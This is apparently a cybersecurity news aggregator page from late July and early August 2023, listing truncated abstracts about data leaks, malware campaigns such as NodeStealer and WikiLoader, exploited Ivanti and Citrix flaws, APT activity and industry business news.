The fast food giant Burger King put their systems and data at risk by exposing sensitive credentials to the public for a second time. Original post @https://cybernews.com/security/burger-king-data-leak/ Burger King is a renowned US-based international...Security Affairs
August 2, 2023 – Business
Nile, Which Offers Enterprise Networks as a Service, Raises $175M Full Text
Abstract
Nile, a networking-as-a-service (NaaS) provider founded by former Cisco executive Pankaj Patel, has raised $175 million in a Series C funding round. The funding will be used for go-to-market growth and expanding the company's workforce.Cyware
August 02, 2023 – Phishing
Phishers Exploit Salesforce’s Email Services Zero-Day in Targeted Facebook Campaign Full Text
Abstract
A sophisticated Facebook phishing campaign has been observed exploiting a zero-day flaw in Salesforce's email services, allowing threat actors to craft targeted phishing messages using the company's domain and infrastructure. "Those phishing campaigns cleverly evade conventional detection methods by chaining the Salesforce vulnerability and legacy quirks in Facebook's Web Games platform," Guardio Labs researchers Oleg Zaytsev and Nati Tal said in a report shared with The Hacker News. The email messages masquerade as coming from Meta, while being sent from an email address with a "@salesforce.com" domain. They seek to trick recipients into clicking on a link by claiming that their Facebook accounts are undergoing a "comprehensive investigation" due to "suspicions of engaging in impersonation." The goal is to direct users to a rogue landing page that's designed to capture the victim's account credentials and two-factor autThe Hacker News
August 2, 2023 – Government
CISA adds second Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added a second actively exploited Ivanti ‘s Endpoint Manager Mobile (EPMM) vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the second actively exploited Ivanti...Security Affairs
August 2, 2023 – Vulnerabilities
Firefox Fixes a Flurry of Flaws in the First of Two Releases This Month Full Text
Abstract
Mozilla has released a new version of Firefox, marking the first of two upgrades for the month. The patched flaws are tracked as CVE-2023-4045, CVE-2023-4047, CVE-2023-4048, CVE-2023-4050, CVE-2023-4051, CVE-2023-4057, and CVE-2023-4058.Cyware
August 02, 2023 – General
Industrial Control Systems Vulnerabilities Soar: Over One-Third Unpatched in 2023 Full Text
Abstract
About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year. According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of 2023, down from 681 reported during the first half of 2022. Of the 670 CVEs, 88 are rated Critical, 349 are rated High, 215 are rated Medium, and 18 are rated Low in Severity. 227 of the flaws have no fixes in comparison to 88 in H1 2022. "Critical manufacturing (37.3% of total reported CVEs) and Energy (24.3% of the total reported) sectors are the most likely to be affected," the OT cybersecurity and asset monitoring company said in a report shared with The Hacker News. Other prominent industry verticals include water and wastewater systems, commercial facilities, communicationThe Hacker News
August 2, 2023 – Policy and Law
Lawsuit Alleges Bytedance’s Capcut App Secretly Reaps Massive Amounts of User Data Full Text
Abstract
CapCut and sister company TikTok are owned by the Chinese company ByteDance Ltd., which has long been under scrutiny by American officials concerned with how it collects and leverages American users’ personal data, allegedly including biometric data.Cyware
August 02, 2023 – General
Top Industries Significantly Impacted by Illicit Telegram Networks Full Text
Abstract
In recent years the rise of illicit activities conducted within online messaging platforms has become a growing concern for countless industries. One of the most notable platforms that has been host to many malicious actors and nefarious activities has been Telegram. Thanks to its accessibility, popularity, and user anonymity, Telegram has attracted a large number of threat actors driven by criminal purposes. Many of the cybercriminals that have moved operations into illicit telegram channels in order to expand their reach and exploits to wider audiences. As a result, many of these illicit Telegram networks have negatively impacted many industries in relation to the increase of cyberattacks and data leaks that have occurred across the globe. While any industry can be affected by the cybercriminals operating on Telegram, there are several industries that are more significantly impacted by these illicit activities. In this post, we'll cover several of the common illicit activiThe Hacker News
August 2, 2023 – Policy and Law
Cyberattack on Montclair Township Led to $450K Settlement Full Text
Abstract
The Garden State Joint Insurance Fund made the deal as law enforcement began investigations into possible criminal charges, Joseph Hartnett, interim township manager, said Thursday.Cyware
August 02, 2023 – Vulnerabilities
Researchers Uncover AWS SSM Agent Misuse as a Covert Remote Access Trojan Full Text
Abstract
Cybersecurity researchers have discovered a new post-exploitation technique in Amazon Web Services (AWS) that allows the AWS Systems Manager Agent (SSM Agent) to be run as a remote access trojan on Windows and Linux environments "The SSM agent, a legitimate tool used by admins to manage their instances, can be re-purposed by an attacker who has achieved high privilege access on an endpoint with SSM agent installed, to carry out malicious activities on an ongoing basis," Mitiga researchers Ariel Szarf and Or Aspir said in a report shared with The Hacker News. "This allows an attacker who has compromised a machine, hosted on AWS or anywhere else, to maintain access to it and perform various malicious activities." SSM Agent is a software installed on Amazon Elastic Compute Cloud (Amazon EC2) instances that makes it possible for administrators to update, manage, and configure their AWS resources through a unified interface. The advantages of using an SSM AgentThe Hacker News
August 2, 2023 – Government
Possible Chinese Malware in US Systems a ‘Ticking Time Bomb’: Report Full Text
Abstract
The Biden administration believes China has implanted malware in key US power and communications networks in a “ticking time bomb” that could disrupt the military in event of a conflict, The New York Times reported Saturday.Cyware
August 02, 2023 – Criminals
Iranian Company Cloudzy Accused of Aiding Cybercriminals and Nation-State Hackers Full Text
Abstract
Services offered by an obscure Iranian company known as Cloudzy are being leveraged by multiple threat actors, including cybercrime groups and nation-state crews. "Although Cloudzy is incorporated in the United States, it almost certainly operates out of Tehran, Iran – in possible violation of U.S. sanctions – under the direction of someone going by the name Hassan Nozari ," Halcyon said in a new report published Tuesday. The Texas-based cybersecurity firm said the company acts as a command-and-control provider (C2P), which provides attackers with Remote Desktop Protocol (RDP) virtual private servers and other anonymized services that ransomware affiliates and others use to pull off the cybercriminal endeavors. "[C2Ps] enjoy a liability loophole that does not require them to ensure that the infrastructure they provide is not being used for illegal operations," Halcyon said in a statement shared with The Hacker News. The ransomware-as-a-service (RaaS) busineThe Hacker News
August 02, 2023
Norwegian Entities Targeted in Ongoing Attacks Exploiting Ivanti EPMM Vulnerability Full Text
Abstract
Advanced persistent threat (APT) actors exploited a recently disclosed critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) as a zero-day since at least April 2023 in attacks directed against Norwegian entities, including a government network. The disclosure comes as part of a new joint advisory released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) Tuesday. The exact identity or origin of the threat actor remains unclear. "The APT actors have exploited CVE-2023-35078 since at least April 2023," the authorities said . "The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy to target infrastructure.' CVE-2023-35078 refers to a severe flaw that allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. It can be chained with a second vulneThe Hacker News
August 1, 2023 – Business
Dynatrace Acquires Cloud-Native Debugging Platform Rookout Full Text
Abstract
Observability and security platform Dynatrace today announced that it plans to acquire Rookout, a Tel Aviv-based observability startup that focuses on helping developers troubleshoot and debug their code in production.Cyware
August 01, 2023 – Malware
New NodeStealer Targeting Facebook Business Accounts and Crypto Wallets Full Text
Abstract
Cybersecurity researchers have unearthed a Python variant of a stealer malware NodeStealer that's equipped to fully take over Facebook business accounts as well as siphon cryptocurrency. Palo Alto Network Unit 42 said it detected the previously undocumented strain as part of a campaign that commenced in December 2022. NodeStealer was first exposed by Meta in May 2023, describing it as a stealer capable of harvesting cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts. While the prior samples were written in JavaScript, the latest versions are coded in Python. "NodeStealer poses great risk for both individuals and organizations," Unit 42 researcher Lior Rochberger said . "Besides the direct impact on Facebook business accounts, which is mainly financial, the malware also steals credentials from browsers, which can be used for further attacks." The attacks start with bogus messages on Facebook that purportedly claiThe Hacker News
August 1, 2023 – Malware
NodeStealer 2.0 takes over Facebook Business accounts and targets crypto wallets Full Text
Abstract
Researchers spotted a Python variant of the NodeStealer that was designed to take over Facebook business accounts and cryptocurrency wallets. Palo Alto Network Unit 42 discovered a previously unreported phishing campaign that distributed...Security Affairs
August 1, 2023 – Phishing
Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack Full Text
Abstract
During the conversation, the malicious actors would send seemingly harmless attachments, such as invitations to conferences or files related to the targets’ professional interests, such as studies or articles.Cyware
August 01, 2023 – Attack
European Bank Customers Targeted in SpyNote Android Trojan Campaign Full Text
Abstract
Various European customers of different banks are being targeted by an Android banking trojan called SpyNote as part of an aggressive campaign detected in June and July 2023. "The spyware is distributed through email phishing or smishing campaigns and the fraudulent activities are executed with a combination of remote access trojan (RAT) capabilities and vishing attack," Italian cybersecurity firm Cleafy said in a technical analysis released Monday. SpyNote , also called SpyMax, is similar to other Android banking Trojans in that it requires Android's accessibility permissions in order to grant itself other necessary permissions and gather sensitive data from infected devices. What makes the malware strain notable is its dual functions as spyware and perform bank fraud. The attack chains commence with a bogus SMS message urging users to install a banking app by clicking on the accompanying link, redirecting the victim to the legitimate TeamViewer QuickSupport aThe Hacker News
August 1, 2023 – Government
US govt is hunting a Chinese malware that can interfere with its military operations Full Text
Abstract
The US government believes that China has deployed malware in key US power and communications networks that can be activated in case of a conflict. American intelligence officials believe China has implanted malware in key US power and communications...Security Affairs
August 1, 2023 – Vulnerabilities
Stremio Vulnerability Exposes Millions to Attack Full Text
Abstract
CyFox researchers have discovered a DLL planting/hijacking vulnerability in popular media center application Stremio, which could be exploited by attackers to execute code on the victim’s system, steal information, and more.Cyware
August 01, 2023 – Education
What is Data Security Posture Management (DSPM)? Full Text
Abstract
Data Security Posture Management is an approach to securing cloud data by ensuring that sensitive data always has the correct security posture - regardless of where it's been duplicated or moved to. So, what is DSPM? Here's a quick example: Let's say you've built an excellent security posture for your cloud data. For the sake of this example, your data is in production, it's protected behind a firewall, it's not publicly accessible, and your IAM controls have limited access properly. Now along comes a developer and replicates that data into a lower environment. What happens to that fine security posture you've built? Well, it's gone - and now the data is only protected by the security posture in that lower environment. So if that environment is exposed or improperly secured - so is all that sensitive data you've been trying to protect. Security postures just don't travel with their data . Data Security Posture Management ( DSPM ) was creaThe Hacker News
August 1, 2023 – Malware
WikiLoader malware-as-a-service targets Italian organizations Full Text
Abstract
Threat actors are targeting Italian organizations with a phishing campaign aimed at delivering a new malware called WikiLoader. WikiLoader is a new piece of malware that is employed in a phishing campaign that is targeting Italian organizations....Security Affairs
August 1, 2023 – Attack
Meow Campaign Reaches Misconfigured Jupyter Notebook Instances Full Text
Abstract
The "Meow" campaign, targeting unsecured databases, has resurfaced, with the threat actor using misconfigured Jupyter Notebook instances to gather information and delete databases.Cyware
August 01, 2023 – Criminals
Researchers Expose Space Pirates’ Cyber Campaign Across Russia and Serbia Full Text
Abstract
The threat actor known as Space Pirates has been linked to attacks against at least 16 organizations in Russia and Serbia over the past year by employing novel tactics and adding new cyber weapons to its arsenal. "The cybercriminals' main goals are still espionage and theft of confidential information, but the group has expanded its interests and the geography of its attacks," Positive Technologies said in a deep dive report published last week. Targets comprise government agencies, educational institutions, private security companies, aerospace manufacturers, agricultural producers, defense, energy, and healthcare firms in Russia and Serbia. Space Pirates was first exposed by the Russian cybersecurity company in May 2022, highlighting its attacks on the aerospace sector in the nation. The group, said to be active since at least late 2019, has links to another adversary tracked by Symantec as Webworm . Positive Technologies' analysis of the attack infrastThe Hacker News
August 1, 2023 – Vulnerabilities
Be aware of exposure of sensitive data on Wi-Fi settings for Canon inkjet printers Full Text
Abstract
Canon warns that sensitive data on the Wi-Fi connection settings stored in the memories of inkjet printers may not be deleted during initialization. Canon warns that sensitive information on the Wi-Fi connection settings stored in the memories of home...Security Affairs
August 1, 2023 – Outage
Mattress Giant Tempur Sealy Hit with Cyberattack Forcing System Shutdown Full Text
Abstract
The company’s chief financial officer Bhaskar Rao reported to the U.S. Securities and Exchange Commission on Monday morning that Tempur Sealy’s operations had been hindered by a cyberattack that began on July 23.Cyware
August 01, 2023
China’s APT31 Suspected in Attacks on Air-Gapped Systems in Eastern Europe Full Text
Abstract
A nation-state actor with links to China is suspected of being behind a series of attacks against industrial organizations in Eastern Europe that took place last year to siphon data stored on air-gapped systems. Cybersecurity company Kaspersky attributed the intrusions with medium to high confidence to a hacking crew called APT31 , which is also tracked under the monikers Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium), citing commonalities in the tactics observed. The attacks entailed the use of more than 15 distinct implants and their variants, broken down into three broad categories based on their ability to establish persistent remote access, gather sensitive information, and transmit the collected data to actor-controlled infrastructure. "One of the implant types appeared to be a sophisticated modular malware, aimed at profiling removable drives and contaminating them with a worm to exfiltrate data from isolated, or air-gapped, networks of indusThe Hacker News
August 1, 2023 – Ransomware
Spike in Ransomware Delivery via URLs, Reports Unit 42 Full Text
Abstract
Ransomware delivered through URLs has become the leading method for distributing ransomware, accounting for over 77% of cases in 2022 - found Unit 42. This is followed by emails at 12%. Researchers observed attackers using different URLs/hostnames to host or deliver different malware, including ran ... Read MoreCyware
August 01, 2023 – Criminals
Cybercriminals Renting WikiLoader to Target Italian Organizations with Banking Trojan Full Text
Abstract
Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called WikiLoader with an ultimate aim to install a banking trojan, stealer, and spyware referred to as Ursnif (aka Gozi). "It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint said in a technical report. "The malware uses multiple mechanisms to evade detection and was likely developed as a malware that can be rented out to select cybercriminal threat actors." WikiLoader is so named due to the malware making a request to Wikipedia and checking that the response has the string "The Free." The enterprise security firm said it first detected the malware in the wild on December 27, 2022, in connection with an intrusion set mounted by a threat actor it tracks as TA544 , which is also known as Bamboo Spider and Zeus Panda. The campaigns are centered around the use of emails containing either MicroThe Hacker News
August 1, 2023 – Policy and Law
Meta Subsidiaries Must Pay $14M Over Misleading Data Collection Disclosure Full Text
Abstract
Facebook's subsidiaries, including Onavo, have been ordered to pay $14 million in an Australian court case for undisclosed data collection through a now-discontinued VPN, highlighting the company's privacy issues.Cyware
July 31, 2023 – Government
White House Unveils National Cyber Workforce Strategy Full Text
Abstract
"Cyber education and workforce development have not kept pace with demand and the rapid pace of technological change," says the strategy document. "Moreover, skills in demand in the cyber workforce are evolving."Cyware
July 31, 2023 – Malware
New P2PInfect Worm Targets Redis Servers with Undocumented Breach Methods Full Text
Abstract
The P2PInfect peer-to-peer (P2) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet. "The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News. "A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command." The Rust-based malware was first documented by Palo Alto Networks Unit 42, calling out the malware's ability to exploit a critical Lua sandbox escape vulnerability ( CVE-2022-0543 , CVSS score: 10.0) to obtain a foothold into Redis instances. The campaign is believed to have commenced on or after June 29, 2023. However, the latest discovery suggests thThe Hacker News
July 31, 2023 – Malware
Experts discovered a previously undocumented initial access vector used by P2PInfect worm Full Text
Abstract
Cado Security observed a new variant of the P2PInfect worm targets Redis servers with a previously undocumented initial access vector. In July, Palo Alto Networks Unit 42 researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that...Security Affairs
July 31, 2023 – General
Blocking Access to ChatGPT is a Short Term Solution to Mitigate Risk Full Text
Abstract
For every 10,000 enterprise users, an enterprise organization is experiencing approximately 183 incidents of sensitive data being posted to ChatGPT per month, according to Netskope.Cyware
July 31, 2023 – Attack
Patchwork Hackers Target Chinese Research Organizations Using EyeShell Backdoor Full Text
Abstract
Threat actors associated with the hacking crew known as Patchwork have been spotted targeting universities and research organizations in China as part of a recently observed campaign. The activity, according to KnownSec 404 Team , entailed the use of a backdoor codenamed EyeShell . Patchwork , also known by the names Operation Hangover and Zinc Emerson, is suspected to be a threat group that operates on behalf of India. Active since at least December 2015, attack chains mounted by the outfit have a narrow focus and tend to single out Pakistan and China with custom implants such as BADNEWS via spear-phishing and watering hole attacks. The adversarial collective has been found to share tactical overlaps with other cyber-espionage groups with an Indian connection, including SideWinder and the DoNot Team . Earlier this May, Meta disclosed that it took down 50 accounts on Facebook and Instagram operated by Patchwork, which took advantage of rogue messaging apps uploaded to theThe Hacker News
July 31, 2023 – Botnet
Experts link AVRecon bot to the malware proxy service SocksEscort Full Text
Abstract
The AVRecon botnet relies on compromised small office/home office (SOHO) routers since at least May 2021. In early July, researchers from Lumen Black Lotus Labs discovered the AVRecon botnet that targets small office/home office (SOHO) routers and infected...Security Affairs
July 31, 2023 – Solution
Ztna can be More Than a VPN Replacement for Application Access Full Text
Abstract
Zero Trust Network Access (ZTNA) should leverage contextual information, implement continuous authentication mechanisms, and be application-aware to make access decisions and reduce the risk of unauthorized access.Cyware
July 31, 2023 – Education
Webinar: Riding the vCISO Wave: How to Provide vCISO Services Full Text
Abstract
Demand for Virtual CISO services is soaring. According to Gartner, the use of vCISO services among small and mid-size businesses and non-regulated enterprises was expected to grow by a whopping 1900% in just one year, from only 1% in 2021 to 20% in 2022! Offering vCISO services can be especially attractive for MSPs and MSSPs. By addressing their customers' needs for proactive cyber resilience, they can generate a growing amount of recurring revenue from existing and new customers. And all while differentiating themselves from the competition. vCISO services also enable upselling of additional products and services the MSP or MSSP specializes in. However, not all MSPs and MSSPs fully understand how to provide vCISO services . Some may be unsure about which services are expected from them. Others may not realize they are already providing vCISO services and have the potential to effortlessly broaden their offerings into a complete vCISO suite or package it differently to make it moreThe Hacker News
July 31, 2023 – Vulnerabilities
Three flaws in Ninja Forms plugin for WordPress impact 900K sites Full Text
Abstract
Experts warn of vulnerabilities impacting the Ninja Forms plugin for WordPress that could be exploited for escalating privileges and data theft. The Ninja Forms plugin for WordPress is affected by multiple vulnerabilities (tracked as CVE-2023-37979,...Security Affairs
July 31, 2023 – Breach
School Accreditation Organization Exposed Sensitive Information on Students, Parents, and Teachers Online Full Text
Abstract
An unprotected database belonging to the Southern Association of Independent Schools (SAIS) was found exposing sensitive data on students, parents, and teachers, including health records, social security numbers, and confidential security reports.Cyware
July 31, 2023 – Botnet
AVRecon Botnet Leveraging Compromised Routers to Fuel Illegal Proxy Service Full Text
Abstract
More details have emerged about a botnet called AVRecon , which has been observed making use of compromised small office/home office (SOHO) routers as part of a multi-year campaign active since at least May 2021. AVRecon was first disclosed by Lumen Black Lotus Labs earlier this month as malware capable of executing additional commands and stealing victim's bandwidth for what appears to be an illegal proxy service made available for other actors. It has also surpassed QakBot in terms of scale, having infiltrated over 41,000 nodes located across 20 countries worldwide. "The malware has been used to create residential proxy services to shroud malicious activity such as password spraying, web-traffic proxying, and ad fraud," the researchers said in the report. This has been corroborated by new findings from KrebsOnSecurity and Spur.us, which last week revealed that "AVrecon is the malware engine behind a 12-year-old service called SocksEscort, which rents hackeThe Hacker News
July 31, 2023 – Vulnerabilities
Experts warn attackers started exploiting Citrix ShareFile RCE flaw CVE-2023-24489 Full Text
Abstract
Researchers warn that threat actors started exploiting Citrix ShareFile RCE vulnerability CVE-2023-24489 in the wild. Citrix ShareFile is a widely used cloud-based file-sharing application, which is affected by the critical remote code execution (RCE)...Security Affairs
July 31, 2023 – Policy and Law
New Jersey Supreme Court to Hear Merck Insurance Dispute Over NotPetya Attack Full Text
Abstract
The New Jersey Supreme Court agreed to review the legal fight between Merck and several of the world’s top insurance providers involving $1.4 billion in claims stemming from the 2017 NotPetya cyberattack.Cyware
July 31, 2023 – Malware
Fruity Trojan Uses Deceptive Software Installers to Spread Remcos RAT Full Text
Abstract
Threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote trojans tools like Remcos RAT. "Among the software in question are various instruments for fine-tuning CPUs, graphic cards, and BIOS; PC hardware-monitoring tools; and some other apps," cybersecurity vendor Doctor Web said in an analysis. "Such installers are used as a decoy and contain not only the software potential victims are interested in, but also the trojan itself with all its components." The exact initial access vector used in the campaign is unclear but it could potentially range from phishing to drive-by downloads to malicious ads. Users who land on the fake site are prompted to download a ZIP installer package. The installer, besides activating the standard installation process, stealthily drops the Fruity trojan, a Python-based malware that unpacks an MPThe Hacker News
July 31, 2023 – Ransomware
VMware ESXi Servers Face New Threat from Abyss Locker Full Text
Abstract
MalwareHunterTeam reported a new variant of the Abyss Locker ransomware designed to target Linux-based VMware ESXi servers. It employs SSH brute force attacks to gain unauthorized access to servers. The ransomware has claimed data theft ranging from 35GB to 700GB. Researchers also suspect a connect ... Read MoreCyware
July 31, 2023 – Vulnerabilities
Multiple Flaws Found in Ninja Forms Plugin Leave 800,000 Sites Vulnerable Full Text
Abstract
Multiple security vulnerabilities have been disclosed in the Ninja Forms plugin for WordPress that could be exploited by threat actors to escalate privileges and steal sensitive data. The flaws, tracked as CVE-2023-37979, CVE-2023-38386, and CVE-2023-38393, impact versions 3.6.25 and below, Patchstack said in a report last week. Ninja Forms is installed on over 800,000 sites. A brief description of each of the vulnerabilities is below - CVE-2023-37979 (CVSS score: 7.1) - A POST-based reflected cross-site scripting (XSS) flaw that could allow any unauthenticated user to achieve privilege escalation on a target WordPress site by tricking privileged users to visit a specially crafted website. CVE-2023-38386 and CVE-2023-38393 - Broken access control flaws in the form submissions export feature that could enable a bad actor with Subscriber and Contributor roles to export all Ninja Forms submissions on a WordPress site. Users of the plugin are recommended to update to versionThe Hacker News
July 30, 2023 – General
In 2022, more than 40% of zero-day exploits used in the wild were variations of previous issues Full Text
Abstract
Google’s Threat Analysis Group Google states that more than 40% of zero-day flaws discovered in 2022 were variants of previous issues. The popular Threat Analysis Group (TAG) Maddie Stone wrote Google’s fourth annual year-in-review of zero-day...Security Affairs
July 30, 2023 – Vulnerabilities
New flaw in Ivanti Endpoint Manager Mobile actively exploited in the wild Full Text
Abstract
Software firm Ivanti disclosed another security vulnerability impacting Endpoint Manager Mobile (EPMM), that it said actively exploited. Ivanti disclosed a new security vulnerability impacting Endpoint Manager Mobile (EPMM), tracked as CVE-2023-35081 (CVSS...Security Affairs
July 30, 2023 – General
Security Affairs newsletter Round 430 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Now...Security Affairs
July 29, 2023 – Vulnerabilities
Exploitation of Recent Citrix ShareFile RCE Vulnerability Begins Full Text
Abstract
The vulnerability, tracked as CVE-2023-24489 (CVSS score of 9.1), was the result of errors leading to unauthenticated file upload, which could then be exploited to obtain RCE, says security firm Assetnote, which identified and reported the bug.Cyware
July 29, 2023 – Malware
New Android Malware CherryBlos Utilizing OCR to Steal Sensitive Data Full Text
Abstract
A new Android malware strain called CherryBlos has been observed making use of optical character recognition (OCR) techniques to gather sensitive data stored in pictures. CherryBlos, per Trend Micro , is distributed via bogus posts on social media platforms and comes with capabilities to steal cryptocurrency wallet-related credentials and act as a clipper to substitute wallet addresses when a victim copies a string matching a predefined format is copied to the clipboard. Once installed, the apps seek users' permissions to grant it accessibility permissions, which allows it to automatically grant itself additional permissions as required. As a defense evasion measure, users attempting to kill or uninstall the app by entering the Settings app are redirected back to the home screen. Besides displaying fake overlays on top of legitimate crypto wallet apps to steal credentials and make fraudulent fund transfers to an attacker-controlled address, CherryBlos utilizes OCR to recogThe Hacker News
July 29, 2023 – Malware
Update: More Malicious NPM Packages Found in Wake of Jumpcloud Supply Chain Hack Full Text
Abstract
An investigation by ReversingLabs researchers has uncovered evidence of more malicious npm packages, with links to the same infrastructure that also appear to target cryptocurrency providers.Cyware
July 29, 2023 – Solution
RFP Template for Browser Security Full Text
Abstract
Increasing cyber threats and attacks have made protecting organizational data a paramount concern for businesses of all sizes. A group of experts have recognized the pressing need for comprehensive browser security solutions and collaborated to develop "The Definitive Browser Security RFP Template . " This resource helps streamline the process of evaluating and procuring browser security platforms. It provides organizations with a standardized approach to enhance their security posture by protecting the key employee workspace - the browser. The Importance of a Standardized RFP Template The RFP (Request for Proposal) template offers numerous advantages for organizations seeking robust browser security solutions. By promoting standardization, the RFP template ensures a consistent structure and format for proposals, saving time and effort for both the procurement team and vendors. Moreover, it facilitates clear and specific instructions to vendors, resulting in higher-qualitThe Hacker News
July 29, 2023 – Breach
CoinsPaid Blames North Korea-Linked APT Lazarus for Theft of $37M Worth of Cryptocurrency Full Text
Abstract
“On July 22nd, CoinsPaid experienced a hacker attack, resulting in the theft of USD 37.3M,” reads the announcement published by the company. “We believe Lazarus expected the attack on CoinsPaid to be much more successful.”Cyware
July 29, 2023 – Solution
Apple Sets New Rules for Developers to Prevent Fingerprinting and Data Misuse Full Text
Abstract
Apple has announced plans to require developers to submit reasons to use certain APIs in their apps starting later this year with the release of iOS 17, iPadOS 17, macOS Sonoma, tvOS 17, and watchOS 10 to prevent their abuse for data collection. "This will help ensure that apps only use these APIs for their intended purpose," the company said in a statement. "As part of this process, you'll need to select one or more approved reasons that accurately reflect how your app uses the API, and your app can only use the API for the reasons you've selected." The APIs that require reasons for use relate to the following - File timestamp APIs System boot time APIs Disk space APIs Active keyboard APIs, and User defaults APIs The iPhone maker said it's making the move to ensure that such APIs are not abused by app developers to collect device signals to carry out fingerprinting , which could be employed to uniquely identify users across different aThe Hacker News
July 29, 2023 – Business
Coro Buys Privatise to Infuse SASE With Network Connectivity Full Text
Abstract
The New York-based company said its acquisition of Jerusalem-based Privatise will provide Coro clients with a secure way to connect, manage and filter out malicious content, according to co-founder Dror Liwer.Cyware
July 29, 2023 – Government
Hackers Deploy “SUBMARINE” Backdoor in Barracuda Email Security Gateway Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday disclosed details of a "novel persistent backdoor" called SUBMARINE deployed by threat actors in connection with the hack on Barracuda Email Security Gateway (ESG) appliances. "SUBMARINE comprises multiple artifacts — including a SQL trigger, shell scripts, and a loaded library for a Linux daemon — that together enable execution with root privileges, persistence, command and control, and cleanup," the agency said . The findings come from an analysis of malware samples obtained from an unnamed organization that had been compromised by threat actors exploiting a critical flaw in ESG devices, CVE-2023-2868 (CVSS score: 9.8), which allows for remote command injection. Evidence gathered so far shows that the attackers behind the activity, a suspected China nexus-actor tracked by Mandiant as UNC4841 , leveraged the flaw as a zero-day in October 2022 to gain initial access to victim envirThe Hacker News
July 29, 2023 – Government
CISA warns about SUBMARINE Backdoor employed in Barracuda ESG attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of threat actors deploying the SUBMARINE Backdoor in Barracuda ESG attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an alert on a malware variant,...Security Affairs
July 29, 2023 – Vulnerabilities
Weintek Weincloud Vulnerabilities Allowed Manipulation, Damaging of ICS Devices Full Text
Abstract
Several vulnerabilities discovered by a researcher from industrial cybersecurity firm TXOne Networks in a Weintek product could have been exploited to manipulate and damage industrial control systems (ICS).Cyware
July 29, 2023 – Vulnerabilities
Ivanti Warns of Another Endpoint Manager Mobile Vulnerability Under Active Attack Full Text
Abstract
Ivanti has disclosed yet another security flaw impacting Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core, that it said has been weaponized as part of an exploit chain by malicious actors in the wild. The new vulnerability, tracked as CVE-2023-35081 (CVSS score: 7.8), impacts supported versions 11.10, 11.9, and 11.8, as well as those that are currently end-of-life (EoL). "CVE-2023-35081 enables an authenticated administrator to perform arbitrary file writes to the EPMM server," the company said in an advisory. "This vulnerability can be used in conjunction with CVE-2023-35078 , bypassing administrator authentication and ACLs restrictions (if applicable)." A successful exploit could allow a threat actor to write arbitrary files on the appliance, thereby enabling the malicious party to execute OS commands on the appliance as the tomcat user. "As of now we are only aware of the same limited number of customers impacted by CVE-2023-35078The Hacker News
July 29, 2023 – Malware
Now Abyss Locker also targets VMware ESXi servers Full Text
Abstract
A Linux variant of the Abyss Locker designed to target VMware ESXi servers appeared in the threat landscape, experts warn. The operators behind the Abyss Locker developed a Linux variant that targets VMware ESXi servers expanding their potential targets. VMware...Security Affairs
July 28, 2023 – Government
DOD, OMB expect September release of proposed CMMC rule Full Text
Abstract
The rule has been delayed several times as the DOD revamp its approach, including changing to the longer proposed rule-making process. Originally, the expectation was that CMMC would come out as an interim final rule to be finalized in 60 days.Cyware
July 28, 2023 – Malware
IcedID Malware Adapts and Expands Threat with Updated BackConnect Module Full Text
Abstract
The threat actors linked to the malware loader known as IcedID have made updates to the BackConnect (BC) module that's used for post-compromise activity on hacked systems, new findings from Team Cymru reveal. IcedID, also called BokBot , is a strain of malware similar to Emotet and QakBot that started off as a banking trojan in 2017, before switching to the role of an initial access facilitator for other payloads. Recent versions of the malware have been observed removing functionality related to online banking fraud to prioritize ransomware delivery. The BackConnect (BC) module, first documented by Netresec in October 2022, relies on a proprietary command-and-control (C2) protocol to exchange commands between a server and the infected host. The protocol, which comes with a VNC component for remote access, has also been identified in other malware such as the now-discontinued BazarLoader and QakBot. In December 2022, Team Cymru reported the discovery of 11 BC C2s aThe Hacker News
July 28, 2023
Russian APT BlueBravo targets diplomatic entities with GraphicalProton backdoor Full Text
Abstract
Russia-linked BlueBravo has been spotted targeting diplomatic entities in Eastern Europe with the GraphicalProton Backdoor. The Russia-linked threat-state actor BlueBravo (aka APT29, Cloaked Ursa, and Midnight Blizzard, Nobelium) has been observed...Security Affairs
July 28, 2023 – Vulnerabilities
Innovative Attack Methodology Leverages the “search-ms” URI Protocol Handler Full Text
Abstract
A legitimate Windows search feature could be exploited by malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans such as AsyncRAT and Remcos RAT.Cyware
July 28, 2023 – Phishing
STARK#MULE Targets Koreans with U.S. Military-themed Document Lures Full Text
Abstract
